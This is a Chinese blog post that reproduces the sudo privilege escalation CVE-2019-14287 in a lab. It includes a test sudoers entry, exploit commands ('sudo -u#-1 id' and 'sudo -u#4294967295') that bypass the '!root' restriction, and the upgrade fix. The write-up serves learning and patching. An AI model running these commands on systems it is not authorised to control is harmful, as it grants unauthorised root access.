Linux sudo 本地提权漏洞复现(CVE-2019-14287)

10月14日,Unix、Linux曝出严重本地提权漏洞CVE-2019-14287,允许拥有sudo权限的用户在特定条件下执行任意root命令。此漏洞可通过修改sudoers文件并利用-1或无符号整数绕过安全策略。升级到sudo 1.8.28可修复此问题。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

10月14日 Unix 、 Linux 爆出了一个严重的本地提权漏洞
通过一个拥有 sudo 权限的用户,在特定场景下可以执行任意的root 命令(sudo 安全策略绕过问题)

漏洞演示环境搭建如下

  • 第一步–修改配置文件
vim /etc/sudoers

root ALL=(ALL:ALL) ALL 下面添加一行测试用户内容

alice ALL = (ALL,!root) /usr/bin/vi,/usr/bin/id

添加完结果如下
在这里插入图片描述

上述这条命令的意思是,alice 用户能够以 非root 的身份进行sudo 执行id 和 vi 命令

  • 第二步–新建alice 用户
useradd alice
  • 第三步–进行测试
su alice    # 通过alice 账户执行命令进行测试

执行sudo id进行测试【正常情况下返回结果如下】
在这里插入图片描述
第一种利用方式:执行 sudo -u#-1 id 进行测试【利用漏洞的返回结果如下,其中-1 也可以替换为-2、-3 等值,只不过uid 就不是root 了,gid、groups 都是root】
在这里插入图片描述
第二种利用方式:执行sudo -u#4294967295 进行测试【利用漏洞的返回结果如下,其中4294967295 是-1 的无符号整型对应的值】
在这里插入图片描述
当我们利用CVE-2019-14287 进行权限绕过之后可以发现成功执行 id 命令

解决方法
sudo 官网已经发布了针对此次漏洞的更新,直接升级到 1.8.28 即可
在这里插入图片描述

https://www.sudo.ws/alerts/minus_1_uid.html

BR
以上

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿雷由

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值